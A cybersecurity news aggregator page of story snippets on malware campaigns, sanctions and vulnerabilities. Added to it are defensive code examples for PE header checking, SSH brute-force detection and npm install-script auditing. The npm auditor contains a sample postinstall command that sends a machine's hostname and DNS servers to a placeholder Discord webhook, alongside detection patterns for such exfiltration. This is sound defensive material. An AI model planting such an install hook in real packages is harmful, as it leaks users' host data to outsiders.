Welcome to our cybersecurity news aggregator! This website gathers news articles from over 60 sources, providing you with a comprehensive and up-to-date overview of the latest happenings in the world of cybersecurity.
We utilize RSS feeds to collect the news, ensuring a streamlined and efficient process. This enables you to stay informed and access a wide variety of perspectives and insights in one convenient location.
Dive into the latest cybersecurity stories and explore the wealth of knowledge available, all in one place.
A new malware campaign is distributing a novel Rust-based information stealer dubbed EDDIESTEALER using the popular ClickFix social engineering tactic initiated via fake CAPTCHA verification pages. "This campaign leverages deceptive CAPTCHA verification pages that trick users into executing a malicious PowerShell script, which ultimately deploys the infostealer, harvesting sensitive data such as
The China-linked threat actor behind the recent in-the-wild exploitation of a critical security flaw in SAP NetWeaver has been attributed to a broader set of attacks targeting organizations in Brazil, India, and Southeast Asia since 2023. "The threat actor mainly targets the SQL injection vulnerabilities discovered on web applications to access the SQL servers of targeted organizations," Trend
Breaking Out of the Security Mosh Pit: When Jason Elrod, CISO of MultiCare Health System, describes legacy healthcare IT environments, he doesn't mince words: "Healthcare loves to walk backwards into the future. And this is how we got here, because there are a lot of things that we could have prepared for that we didn't, because we were so concentrated on where we were." This chaotic approach has
The U.S. Department of Treasury's Office of Foreign Assets Control (OFAC) has levied sanctions against a Philippines-based company named Funnull Technology Inc. and its administrator Liu Lizhi for providing infrastructure to conduct romance baiting scams that led to massive cryptocurrency losses. The Treasury accused the Taguig-headquartered company of enabling thousands of websites involved in
ConnectWise, the developer of remote access and support software ScreenConnect, has disclosed that it was the victim of a cyber attack that it said was likely perpetrated by a nation-state threat actor. "ConnectWise recently learned of suspicious activity within our environment that we believe was tied to a sophisticated nation-state actor, which affected a very small number of ScreenConnect
Meta on Thursday revealed that it disrupted three covert influence operations originating from Iran, China, and Romania during the first quarter of 2025. "We detected and removed these campaigns before they were able to build authentic audiences on our apps," the social media giant said in its quarterly Adversarial Threat Report. This included a network of 658 accounts on Facebook, 14 Pages, and
Fake installers for popular artificial intelligence (AI) tools like OpenAI ChatGPT and InVideo AI are being used as lures to propagate various threats, such as the CyberLock and Lucky_Gh0$t ransomware families, and a new malware dubbed Numero. "CyberLock ransomware, developed using PowerShell, primarily focuses on encrypting specific files on the victim's system," Cisco Talos researcher Chetan
Cybersecurity researchers have taken the wraps off an unusual cyber attack that leveraged malware with corrupted DOS and PE headers, according to new findings from Fortinet. The DOS (Disk Operating System) and PE (Portable Executable) headers are essential parts of a Windows PE file, providing information about the executable. While the DOS header makes the executable file backward compatible
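The Fortinet item above hinges on the two headers every Windows loader and most scanners consult first. The following is an added example, not code from Fortinet or from the malware described: it parses the IMAGE_DOS_HEADER and the PE signature/COFF header from raw bytes and reports which field fails, which is exactly what breaks when those headers are deliberately corrupted. The header blobs it checks are constructed inline (the offsets and field layout are the documented PE format; the sample values and the "corrupt" switch are invented for the example).

```python
"""Sanity-check the DOS and PE headers of a Windows executable (added example)."""
import struct

DOS_MAGIC = b"MZ"
PE_SIGNATURE = b"PE\x00\x00"
E_LFANEW_OFFSET = 0x3C      # offset of e_lfanew inside IMAGE_DOS_HEADER
DOS_HEADER_SIZE = 0x40      # sizeof(IMAGE_DOS_HEADER)
COFF_HEADER_SIZE = 20       # sizeof(IMAGE_FILE_HEADER)
MACHINE_NAMES = {0x014C: "i386", 0x8664: "x86-64", 0xAA64: "arm64"}


def check_pe_headers(data: bytes) -> dict:
    """Return dos_ok/pe_ok flags, the machine type, and a list of header problems.

    An empty 'problems' list means the DOS and PE headers are structurally sane;
    each problem string names the field that failed so a scanner can log it.
    """
    result = {"dos_ok": False, "pe_ok": False, "machine": None, "problems": []}

    if len(data) < DOS_HEADER_SIZE:
        result["problems"].append("file shorter than IMAGE_DOS_HEADER")
        return result
    if data[:2] != DOS_MAGIC:
        result["problems"].append("missing MZ magic in DOS header")
        return result
    result["dos_ok"] = True

    (e_lfanew,) = struct.unpack_from("<I", data, E_LFANEW_OFFSET)
    # e_lfanew must point past the DOS header and leave room for the 4-byte
    # signature plus the COFF header that immediately follows it.
    if e_lfanew < DOS_HEADER_SIZE or e_lfanew + 4 + COFF_HEADER_SIZE > len(data):
        result["problems"].append(f"e_lfanew 0x{e_lfanew:x} points outside the file")
        return result
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        result["problems"].append("PE signature not found at e_lfanew")
        return result
    result["pe_ok"] = True

    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, num_sections, _, _, _, opt_size, _ = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    result["machine"] = MACHINE_NAMES.get(machine, f"unknown(0x{machine:04x})")
    if machine not in MACHINE_NAMES:
        result["problems"].append("unrecognised Machine value in COFF header")
    if num_sections == 0 or num_sections > 96:
        result["problems"].append(f"implausible NumberOfSections {num_sections}")
    if opt_size == 0:
        result["problems"].append("SizeOfOptionalHeader is 0 (no optional header)")
    return result


def make_sample(corrupt: str = "") -> bytes:
    """Construct a minimal header blob (not a real file); 'corrupt' picks a field to break."""
    e_lfanew = 0x80
    dos = bytearray(DOS_HEADER_SIZE)
    dos[:2] = DOS_MAGIC
    struct.pack_into("<I", dos, E_LFANEW_OFFSET, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, 3, 0, 0, 0, 240, 0x22)
    blob = bytearray(e_lfanew + 4 + COFF_HEADER_SIZE)
    blob[:DOS_HEADER_SIZE] = dos
    blob[e_lfanew:e_lfanew + 4] = PE_SIGNATURE
    blob[e_lfanew + 4:] = coff
    if corrupt == "dos_magic":
        blob[:2] = b"\x00\x00"
    elif corrupt == "e_lfanew":
        struct.pack_into("<I", blob, E_LFANEW_OFFSET, 0xFFFFFFF0)
    elif corrupt == "pe_sig":
        blob[e_lfanew:e_lfanew + 4] = b"\x00\x00\x00\x00"
    return bytes(blob)


if __name__ == "__main__":
    for variant in ("", "dos_magic", "e_lfanew", "pe_sig"):
        print(variant or "clean", check_pe_headers(make_sample(variant)))
```

Run it against a real binary with `check_pe_headers(open(path, "rb").read())`; a sample that fails the MZ or e_lfanew check yet still executes is the signal that something other than the normal Windows loader is mapping it, which is the situation the Fortinet finding describes.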
The threat actors behind the DragonForce ransomware gained access to an unnamed Managed Service Provider's (MSP) SimpleHelp remote monitoring and management (RMM) tool, and then leveraged it to exfiltrate data and drop the locker on multiple endpoints. It's believed that the attackers exploited a trio of security flaws in SimpleHelp (CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726) that were
Google on Wednesday disclosed that the Chinese state-sponsored threat actor known as APT41 leveraged a malware called TOUGHPROGRESS that uses Google Calendar for command-and-control (C2). The tech giant, which discovered the activity in late October 2024, said the malware was hosted on a compromised government website and was used to target multiple other government entities. "Misuse of cloud
Cybersecurity researchers have disclosed a critical unpatched security flaw impacting TI WooCommerce Wishlist plugin for WordPress that could be exploited by unauthenticated attackers to upload arbitrary files. TI WooCommerce Wishlist, which has over 100,000 active installations, is a tool to allow e-commerce site customers to save their favorite products for later and share the lists on social
An Iranian national has pleaded guilty in the U.S. over his involvement in an international ransomware and extortion scheme involving the Robbinhood ransomware. Sina Gholinejad (aka Sina Ghaaf), 37, and his co-conspirators are said to have breached the computer networks of various organizations in the United States and encrypted files with Robbinhood ransomware to demand Bitcoin ransom payments.
The Czech Republic on Wednesday formally accused a threat actor associated with the People's Republic of China (PRC) of targeting its Ministry of Foreign Affairs. In a public statement, the government said it identified China as the culprit behind a malicious campaign targeting one of the unclassified networks of the Czech Ministry of Foreign Affairs. The extent of the breach is presently not
Cybersecurity researchers have discovered a security flaw in Microsoft's OneDrive File Picker that, if successfully exploited, could allow websites to access a user's entire cloud storage content, as opposed to just the files selected for upload via the tool. "This stems from overly broad OAuth scopes and misleading consent screens that fail to clearly explain the extent of access being granted,
Embedded Linux-based Internet of Things (IoT) devices have become the target of a new botnet dubbed PumaBot. Written in Go, the botnet is designed to conduct brute-force attacks against SSH instances to expand in size and scale and deliver additional malware to the infected hosts. "Rather than scanning the internet, the malware retrieves a list of targets from a command-and-control (C2) server
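PumaBot's growth mechanism is plain SSH password guessing, which is one of the easiest things to see on the victim side. The detector below is an added example, not code from the PumaBot research or from any product: it reads OpenSSH-style sshd log lines, counts "Failed password" events per source IP in a sliding time window, and marks the worst case where an "Accepted" line from the same IP follows the burst. The log lines are constructed for the example (documentation-range IPs, invented host name), the 60-second/5-attempt thresholds are assumptions to tune, and the year is assumed because syslog timestamps carry none.

```python
"""Flag SSH password brute-forcing from sshd auth-log lines (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches the OpenSSH failure line, e.g.
# "May 28 10:15:01 edge sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 41022 ssh2"
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+\S+\s+sshd\[\d+\]:\s+"
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)
ACCEPTED_RE = re.compile(r"Accepted \w+ for (?P<user>\S+) from (?P<ip>[\d.]+)")

# Constructed sample log, not captured data.
SAMPLE_LOG = """\
May 28 10:15:01 edge sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 41022 ssh2
May 28 10:15:03 edge sshd[1203]: Failed password for root from 203.0.113.5 port 41030 ssh2
May 28 10:15:04 edge sshd[1205]: Failed password for invalid user pi from 203.0.113.5 port 41044 ssh2
May 28 10:15:06 edge sshd[1207]: Failed password for invalid user ubuntu from 203.0.113.5 port 41051 ssh2
May 28 10:15:07 edge sshd[1209]: Failed password for root from 203.0.113.5 port 41058 ssh2
May 28 10:15:09 edge sshd[1211]: Accepted password for root from 203.0.113.5 port 41060 ssh2
May 28 10:20:00 edge sshd[1300]: Failed password for alice from 198.51.100.7 port 50011 ssh2
May 28 10:31:00 edge sshd[1302]: Failed password for alice from 198.51.100.7 port 50012 ssh2
May 28 10:31:05 edge sshd[1303]: Accepted publickey for alice from 198.51.100.7 port 50013 ssh2
"""


def parse_ts(ts: str, year: int = 2025) -> datetime:
    """syslog timestamps have no year; the caller supplies one (assumed here)."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(log_text: str, threshold: int = 5, window_s: int = 60) -> list:
    """Return one alert per source IP with >= threshold failures inside window_s seconds.

    Each alert records the IP, how many failures were in the window when it
    tripped, the distinct user names tried, and whether a later 'Accepted'
    line from that IP followed (a successful guess: the host is now a
    candidate bot, not just a target).
    """
    failures = defaultdict(deque)   # ip -> timestamps of failures still in the window
    users = defaultdict(set)
    alerted = {}
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ip, ts = m["ip"], parse_ts(m["ts"])
            q = failures[ip]
            q.append(ts)
            users[ip].add(m["user"])
            # slide the window: drop failures older than window_s
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()
            if len(q) >= threshold and ip not in alerted:
                alerted[ip] = {"ip": ip, "failures": len(q),
                               "users": sorted(users[ip]), "success_after": False}
            continue
        a = ACCEPTED_RE.search(line)
        if a and a["ip"] in alerted:
            alerted[a["ip"]]["success_after"] = True
    return list(alerted.values())


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The second source in the sample (two failures eleven minutes apart, then a key-based login) never trips the window, which is the point of counting within a window rather than over the whole file. Pair the alert with the usual fixes on the device side: password authentication off, keys only, and the SSH service not reachable from the Internet at all.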
Stealer malware no longer just steals passwords. In 2025, it steals live sessions—and attackers are moving faster and more efficiently than ever. While many associate account takeovers with personal services, the real threat is unfolding in the enterprise. Flare's latest research, The Account and Session Takeover Economy, analyzed over 20 million stealer logs and tracked attacker activity across
A financially motivated threat actor has been observed exploiting a recently disclosed remote code execution flaw affecting the Craft Content Management System (CMS) to deploy multiple payloads, including a cryptocurrency miner, a loader dubbed Mimo Loader, and residential proxyware. The vulnerability in question is CVE-2025-32432, a maximum severity flaw in Craft CMS that was patched in
Would you expect an end user to log on to a cybercriminal's computer, open their browser, and type in their usernames and passwords? Hopefully not! But that's essentially what happens if they fall victim to a Browser-in-the-Middle (BitM) attack. Like Man-in-the-Middle (MitM) attacks, BitM sees criminals look to control the data flow between the victim's computer and the target service, as
Cybersecurity researchers have disclosed details of a coordinated cloud-based scanning activity that targeted 75 distinct "exposure points" earlier this month. The activity, observed by GreyNoise on May 8, 2025, involved as many as 251 malicious IP addresses that are all geolocated to Japan and hosted by Amazon. "These IPs triggered 75 distinct behaviors, including CVE exploits,
Apple on Tuesday revealed that it prevented over $9 billion in fraudulent transactions in the last five years, including more than $2 billion in 2024 alone. The company said the App Store is confronted by a wide range of threats that seek to defraud users in various ways, ranging from "deceptive apps designed to steal personal information to fraudulent payment schemes that attempt to exploit
Misconfigured Docker API instances have become the target of a new malware campaign that transforms them into a cryptocurrency mining botnet. The attacks, designed to mine for Dero currency, are notable for their worm-like capabilities to propagate the malware to other exposed Docker instances and rope them into an ever-growing horde of mining bots. Kaspersky said it observed an unidentified threat
Cybersecurity researchers have disclosed a new malicious campaign that uses a fake website advertising antivirus software from Bitdefender to dupe victims into downloading a remote access trojan called Venom RAT. The campaign indicates a "clear intent to target individuals for financial gain by compromising their credentials, crypto wallets, and potentially selling access to their systems," the
Microsoft has shed light on a previously undocumented cluster of malicious activity originating from a Russia-affiliated threat actor dubbed Void Blizzard (aka Laundry Bear) that it said is attributed to "worldwide cloud abuse." Active since at least April 2024, the hacking group is linked to espionage operations mainly targeting organizations that are important to Russian government objectives,
Artificial intelligence is driving a massive shift in enterprise productivity, from GitHub Copilot's code completions to chatbots that mine internal knowledge bases for instant answers. Each new agent must authenticate to other services, quietly swelling the population of non-human identities (NHIs) across corporate clouds. That population is already overwhelming the enterprise: many companies
Threat hunters have exposed a novel campaign that makes use of search engine optimization (SEO) poisoning techniques to target employee mobile devices and facilitate payroll fraud. The activity, first detected by ReliaQuest in May 2025 targeting an unnamed customer in the manufacturing sector, is characterized by the use of fake login pages to access the employee payroll portal and redirect
The U.S. Federal Bureau of Investigation (FBI) has warned of social engineering attacks mounted by a criminal extortion actor known as Luna Moth targeting law firms over the past two years. The campaign leverages "information technology (IT) themed social engineering calls, and callback phishing emails, to gain remote access to systems or devices and steal sensitive data to extort the victims,"
The Russia-aligned threat actor known as TAG-110 has been observed conducting a spear-phishing campaign targeting Tajikistan using macro-enabled Word templates as an initial payload. The attack chain is a departure from the threat actor's previously documented use of an HTML Application (.HTA) loader dubbed HATVIBE, Recorded Future's Insikt Group said in an analysis. "Given TAG-110's historical
As many as 60 malicious npm packages have been discovered in the package registry with malicious functionality to harvest hostnames, IP addresses, DNS servers, and user directories to a Discord-controlled endpoint. The packages, published under three different accounts, come with an install-time script that's triggered during npm install, Socket security researcher Kirill Boychenko said in a
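The npm item above turns on one mechanism: a lifecycle script (preinstall, install, postinstall) that runs during `npm install`, before anyone has read the package. Auditing those hooks is a cheap supply-chain check to put in CI, and the script below is an added example of it, not code from Socket or from the packages described. It parses a package.json, lists the install-time hooks, and flags commands that do things a benign build step rarely needs at install time (inline `node -e`, downloads, Discord webhooks, host and DNS enumeration). The three manifests are constructed for the example; package names, the webhook URL and the commands are invented, and the heuristic list is an assumption to extend.

```python
"""Audit npm package.json lifecycle scripts for install-time execution (added example)."""
import json
import re

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristics: (pattern over the script command, human-readable reason).
SUSPICIOUS = [
    (re.compile(r"\bnode\s+-e\b"), "inline node -e script"),
    (re.compile(r"\b(curl|wget)\b"), "downloads something during install"),
    (re.compile(r"discord(?:app)?\.com/api/webhooks"), "posts to a Discord webhook"),
    (re.compile(r"base64|atob\("), "base64-decodes a payload"),
    (re.compile(r"(?:\bos\.|require\(['\"]os['\"]\)\.)(hostname|networkInterfaces|userInfo)"
                r"|\b(whoami|ifconfig)\b"), "collects host fingerprint"),
    (re.compile(r"require\(['\"]dns['\"]\)\.getServers"), "reads DNS server list"),
]


def audit_manifest(package_json: str) -> dict:
    """Return {'name', 'hooks': {hook: command}, 'findings': [(hook, reason), ...]}."""
    pkg = json.loads(package_json)
    scripts = pkg.get("scripts") or {}
    hooks = {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}
    findings = []
    for hook, cmd in hooks.items():
        for pattern, reason in SUSPICIOUS:
            if pattern.search(cmd):
                findings.append((hook, reason))
    return {"name": pkg.get("name", "?"), "hooks": hooks, "findings": findings}


def risk_level(report: dict) -> str:
    """'none' = no install hooks; 'review' = hooks present, nothing matched; 'high' = matches."""
    if not report["hooks"]:
        return "none"
    return "high" if report["findings"] else "review"


# Constructed manifests: a pure-JS package, a native addon with a legitimate
# build hook, and one that phones home at install time (all invented).
CLEAN = json.dumps({"name": "left-pad-ish", "version": "1.0.0",
                    "scripts": {"test": "node test.js"}})
NATIVE = json.dumps({"name": "some-native-addon", "version": "2.1.0",
                     "scripts": {"install": "node-gyp rebuild"}})
SHADY = json.dumps({"name": "flatmap-stream-like", "version": "0.1.3",
                    "scripts": {"postinstall":
                                "node -e \"require('https').request("
                                "'https://discord.com/api/webhooks/0000/EXAMPLE',"
                                "{method:'POST'}).end(JSON.stringify({"
                                "h:require('os').hostname(),"
                                "d:require('dns').getServers()}))\""}})

if __name__ == "__main__":
    for manifest in (CLEAN, NATIVE, SHADY):
        report = audit_manifest(manifest)
        print(report["name"], risk_level(report), report["findings"])
```

Run it over `node_modules/*/package.json` after a fresh install, or better, before one with `npm install --ignore-scripts` and a review of every "review"/"high" hit. The native addon lands in "review" rather than "high" on purpose: an install hook is not malicious by itself, but it is the place to look.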
Are your web privacy controls protecting your users, or just a box-ticking exercise? This CISO's guide provides a practical roadmap for continuous web privacy validation that's aligned with real-world practices. – Download the full guide here. Web Privacy: From Legal Requirement to Business Essential As regulators ramp up enforcement and users grow more privacy-aware, CISOs face a mounting
Cyber threats don't show up one at a time anymore. They're layered, planned, and often stay hidden until it's too late. For cybersecurity teams, the key isn't just reacting to alerts—it's spotting early signs of trouble before they become real threats. This update is designed to deliver clear, accurate insights based on real patterns and changes we can verify. With today's complex systems, we
Cybersecurity researchers have disclosed a malware campaign that uses fake software installers masquerading as popular tools like LetsVPN and QQ Browser to deliver the Winos 4.0 framework. The campaign, first detected by Rapid7 in February 2025, involves the use of a multi-stage, memory-resident loader called Catena. "Catena uses embedded shellcode and configuration switching logic to stage
The malware known as Latrodectus has become the latest to embrace the widely-used social engineering technique called ClickFix as a distribution vector. "The ClickFix technique is particularly risky because it allows the malware to execute in memory rather than being written to disk," Expel said in a report shared with The Hacker News. "This removes many opportunities for browsers or security
Cybersecurity researchers have disclosed that a threat actor codenamed ViciousTrap has compromised nearly 5,300 unique network edge devices across 84 countries and turned them into a honeypot-like network. The threat actor has been observed exploiting a critical security flaw impacting Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers (CVE-2023-20118) to corral them into
As part of the latest "season" of Operation Endgame, a coalition of law enforcement agencies have taken down about 300 servers worldwide, neutralized 650 domains, and issued arrest warrants against 20 targets. Operation Endgame, first launched in May 2024, is an ongoing law enforcement operation targeting services and infrastructures assisting in or directly providing initial or consolidating
From zero-day exploits to large-scale bot attacks — the demand for a powerful, self-hosted, and user-friendly web application security solution has never been greater. SafeLine is currently the most starred open-source Web Application Firewall (WAF) on GitHub, with over 16.4K stars and a rapidly growing global user base. This walkthrough covers what SafeLine is, how it works, and why it's
The U.S. Department of Justice (DoJ) on Thursday announced the disruption of the online infrastructure associated with DanaBot (aka DanaTools) and unsealed charges against 16 individuals for their alleged involvement in the development and deployment of the malware, which it said was controlled by a Russia-based cybercrime organization. The malware, the DoJ said, infected more than 300,000
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday revealed that Commvault is monitoring cyber threat activity targeting applications hosted in their Microsoft Azure cloud environment. "Threat actors may have accessed client secrets for Commvault's (Metallic) Microsoft 365 (M365) backup software-as-a-service (SaaS) solution, hosted in Azure," the agency said. "This
Cybersecurity researchers have discovered an indirect prompt injection flaw in GitLab's artificial intelligence (AI) assistant Duo that could have allowed attackers to steal source code and inject untrusted HTML into its responses, which could then be used to direct victims to malicious websites. GitLab Duo is an artificial intelligence (AI)-powered coding assistant that enables users to write,
A Chinese-speaking threat actor tracked as UAT-6382 has been linked to the exploitation of a now-patched remote-code-execution vulnerability in Trimble Cityworks to deliver Cobalt Strike and VShell. "UAT-6382 successfully exploited CVE-2025-0944, conducted reconnaissance, and rapidly deployed a variety of web shells and custom-made malware to maintain long-term access," Cisco Talos researchers
A privilege escalation flaw has been demonstrated in Windows Server 2025 that makes it possible for attackers to compromise any user in Active Directory (AD). "The attack exploits the delegated Managed Service Account (dMSA) feature that was introduced in Windows Server 2025, works with the default configuration, and is trivial to implement," Akamai security researcher Yuval Gordon said in a
A recently patched pair of security flaws affecting Ivanti Endpoint Manager Mobile (EPMM) software has been exploited by a China-nexus threat actor to target a wide range of sectors across Europe, North America, and the Asia-Pacific region. The vulnerabilities, tracked as CVE-2025-4427 (CVSS score: 5.3) and CVE-2025-4428 (CVSS score: 7.2), could be chained to execute arbitrary code on a
It's not enough to be secure. In today's legal climate, you need to prove it. Whether you're protecting a small company or managing compliance across a global enterprise, one thing is clear: cybersecurity can no longer be left to guesswork, vague frameworks, or best-effort intentions. Regulators and courts are now holding organizations accountable for how "reasonable" their security programs are
For many organizations, identity security appears to be under control. On paper, everything checks out. But new research from Cerby, based on insights from over 500 IT and security leaders, reveals a different reality: too much still depends on people—not systems—to function. In fact, fewer than 4% of security teams have fully automated their core identity workflows. Core workflows, like
Cybersecurity researchers have uncovered multiple critical security vulnerabilities impacting the Versa Concerto network security and SD-WAN orchestration platform that could be exploited to take control of susceptible instances. It's worth noting that the identified shortcomings remain unpatched despite responsible disclosure on February 13, 2025, prompting a public release of the issues
A sprawling operation undertaken by global law enforcement agencies and a consortium of private sector firms has disrupted the online infrastructure associated with a commodity information stealer known as Lumma (aka LummaC or LummaC2), seizing 2,300 domains that acted as the command-and-control (C2) backbone to commandeer infected Windows systems. "Malware like LummaC2 is deployed to steal
Russian cyber threat actors have been attributed to a state-sponsored campaign targeting Western logistics entities and technology companies since 2022. The activity has been assessed to be orchestrated by APT28 (aka BlueDelta, Fancy Bear, or Forest Blizzard), which is linked to the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center, Military Unit 26165.
Russian organizations have become the target of a phishing campaign that distributes malware called PureRAT, according to new findings from Kaspersky. "The campaign aimed at Russian business began back in March 2023, but in the first third of 2025 the number of attacks quadrupled compared to the same period in 2024," the cybersecurity vendor said. The attack chains, which have not been
Counterfeit Facebook pages and sponsored ads on the social media platform are being employed to direct users to fake websites masquerading as Kling AI with the goal of tricking victims into downloading malware. Kling AI is an artificial intelligence (AI)-powered platform to synthesize images and videos from text and image prompts. Launched in June 2024, it's developed by Kuaishou Technology,
Continuous Integration and Continuous Delivery/Deployment (CI/CD) refers to practices that automate how code is developed and released to different environments. CI/CD pipelines are fundamental in modern software development, ensuring code is consistently tested, built, and deployed quickly and efficiently. While CI/CD automation accelerates software delivery, it can also introduce security
It takes just one email to compromise an entire system. A single well-crafted message can bypass filters, trick employees, and give attackers the access they need. Left undetected, these threats can lead to credential theft, unauthorized access, and even full-scale breaches. As phishing techniques become more evasive, they can no longer be reliably caught by automated solutions alone. Let's take
The U.S. government today imposed economic sanctions on Funnull Technology Inc., a Philippines-based company that provides computer infrastructure for hundreds of thousands of websites involved in virtual currency investment scams, commonly known as "pig butchering." In January 2025, KrebsOnSecurity detailed how Funnull was being used as a content delivery network that catered to cybercriminals seeking to route their traffic through U.S.-based cloud providers.
Authorities in Pakistan have arrested 21 individuals accused of operating "Heartsender," a once popular spam and malware dissemination service that operated for more than a decade. The main clientele for HeartSender were organized crime groups that tried to trick victim companies into making payments to a third party, and its alleged proprietors were publicly identified by KrebsOnSecurity in 2021 after they inadvertently infected their computers with malware.
The U.S. government today unsealed criminal charges against 16 individuals accused of operating and selling DanaBot, a prolific strain of information-stealing malware that has been sold on Russian cybercrime forums since 2018. The FBI says a newer version of DanaBot was used for espionage, and that many of the defendants exposed their real-life identities after accidentally infecting their own systems with the malware.
KrebsOnSecurity last week was hit by a near record distributed denial-of-service (DDoS) attack that clocked in at more than 6.3 terabits of data per second (a terabit is one trillion bits of data). The brief attack appears to have been a test run for a massive new Internet of Things (IoT) botnet capable of launching crippling digital assaults that few web destinations can withstand. Read on for more about the botnet, the attack, and the apparent creator of this global menace.
In what experts are calling a novel legal outcome, the 22-year-old former administrator of the cybercrime community Breachforums will forfeit nearly $700,000 to settle a civil lawsuit from a health insurance company whose customer data was posted for sale on the forum in 2023. Conor Brian Fitzpatrick, a.k.a. "Pompompurin," is slated for resentencing next month after pleading guilty to access device fraud and possession of child sexual abuse material (CSAM).
Microsoft on Tuesday released software updates to fix at least 70 vulnerabilities in Windows and related products, including five zero-day flaws that are already seeing active exploitation. Adding to the sense of urgency with this month's patch batch from Redmond are fixes for two other weaknesses that now have public proof-of-concept exploits available.
A Texas firm recently charged with conspiring to distribute synthetic opioids in the United States is at the center of a vast network of companies in the U.S. and Pakistan whose employees are accused of using online ads to scam westerners seeking help with trademarks, book writing, mobile app development and logo designs, a new investigation reveals.
An employee at Elon Musk's artificial intelligence company xAI leaked a private key on GitHub that for the past two months could have allowed anyone to query private xAI large language models (LLMs) which appear to have been custom made for working with internal data from Musk's companies, including SpaceX, Tesla and Twitter/X, KrebsOnSecurity has learned.
A 23-year-old Scottish man thought to be a member of the prolific Scattered Spider cybercrime group was extradited last week from Spain to the United States, where he is facing charges of wire fraud, conspiracy and identity theft. U.S. prosecutors allege Tyler Robert Buchanan and co-conspirators hacked into dozens of companies in the United States and abroad, and that he personally controlled more than $26 million stolen from victims.
A whistleblower at the National Labor Relations Board (NLRB) alleged last week that denizens of Elon Musk's Department of Government Efficiency (DOGE) siphoned gigabytes of data from the agency's sensitive case files in early March. The whistleblower said accounts created for DOGE at the NLRB downloaded three code repositories from GitHub. Further investigation into one of those code bundles shows it is remarkably similar to a program published in January 2025 by Marko Elez, a 25-year-old DOGE employee who has worked at a number of Musk's companies.
There's a new cybersecurity awareness campaign: Take9. The idea is that people—you, me, everyone—should just pause for nine seconds and think more about the link they are planning to click on, the file they are planning to download, or whatever it is they are planning to share.
There's a website—of course—and a video, well-produced and scary. But the campaign won't do much to improve cybersecurity. The advice isn't reasonable, it won't make either individuals or nations appreciably safer, and it deflects blame from the real causes of our cyberspace insecurities...
I hadn't known that the NGC 1068 galaxy is nicknamed the "Squid Galaxy." It is, and it's spewing neutrinos without the usual accompanying gamma rays.
The only links are from The Daily Mail and The Mirror, but a marital affair was discovered because the cheater was recorded using his smart toothbrush at home when he was supposed to be at work.
Russia is proposing a rule that all foreigners in Moscow install a tracking app on their phones.
Using a mobile application that all foreigners will have to install on their smartphones, the Russian state will receive the following information:
- Residence location
- Fingerprint
- Face photograph
- Real-time geo-location monitoring
This isn’t the first time we’ve seen this. Qatar did it in 2022 around the World Cup:
"After accepting the terms of these apps, moderators will have complete control of users' devices," he continued. "All personal content, the ability to edit it, share it, extract it as well as data from other apps on your device is in their hands. Moderators will even have the power to unlock users' devices remotely." ...
One of my biggest worries about VPNs is the amount of trust users need to place in them, and how opaque most of them are about who owns them and what sorts of data they retain.
A new study found that many commercial VPNs are (often surreptitiously) owned by Chinese companies.
It would be hard for U.S. users to avoid the Chinese VPNs. The ownership of many appeared deliberately opaque, with several concealing their structure behind layers of offshore shell companies. TTP was able to determine the Chinese ownership of the 20 VPN apps being offered to Apple's U.S. users by piecing together corporate documents from around the world. None of those apps clearly disclosed their Chinese ownership...
Interesting story:
USS Stein was underway when her anti-submarine sonar gear suddenly stopped working. On returning to port and putting the ship in a drydock, engineers observed many deep scratches in the sonar dome’s rubber “NOFOUL” coating. In some areas, the coating was described as being shredded, with rips up to four feet long. Large claws were left embedded at the bottom of most of the scratches.
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
Technology and innovation have transformed every part of society, including our electoral experiences. Campaigns are spending and doing more than at any other time in history. Ever-growing war chests fuel billions of voter contacts every cycle. Campaigns now have better ways of scaling outreach methods and offer volunteers and donors more efficient ways to contribute time and money. Campaign staff have adapted to vast changes in media and social media landscapes, and use data analytics to forecast voter turnout and behavior.
Yet despite these unprecedented investments in mobilizing voters, overall trust in electoral health, democratic institutions, voter satisfaction, and electoral engagement has significantly declined. What might we be missing?...
I already knew about the declining response rate for polls and surveys. The percentage of AI bots that respond to surveys is also increasing.
Solutions are hard:
1. Make surveys less boring.
We need to move past bland, grid-filled surveys and start designing experiences people actually want to complete. That means mobile-first layouts, shorter runtimes, and maybe even a dash of storytelling. TikTok or dating app style surveys wouldn't be a bad idea or is that just me being too much Gen Z?
2. Bot detection.
There's a growing toolkit of ways to spot AI-generated responses—using things like response entropy, writing style patterns or even metadata like keystroke timing. Platforms should start integrating these detection tools more widely. Ideally, you introduce an element that only humans can do, e.g., you have to pick up your prize somewhere in-person. Btw, note that these bots can easily be designed to find ways around the most common detection tactics such as Captchas, timed responses and postcode and IP recognition. Believe me, way less code than you suspect is needed to do this...
A DoorDash driver stole over $2.5 million over several months:
The driver, Sayee Chaitainya Reddy Devagiri, placed expensive orders from a fraudulent customer account in the DoorDash app. Then, using DoorDash employee credentials, he manually assigned the orders to driver accounts he and the others involved had created. Devagiri would then mark the undelivered orders as complete and prompt DoorDash's system to pay the driver accounts. Then he'd switch those same orders back to "in process" and do it all over again. Doing this "took less than five minutes, and was repeated hundreds of times for many of the orders," writes the US Attorney's Office...
Eufy features the cheapest robot vacuum combination this year, with a handheld unit built into the robot's body instead of the dock.
I tested the best sleep headphones to find which whisked me away to sleep in minutes. These are the ones I recommend most.
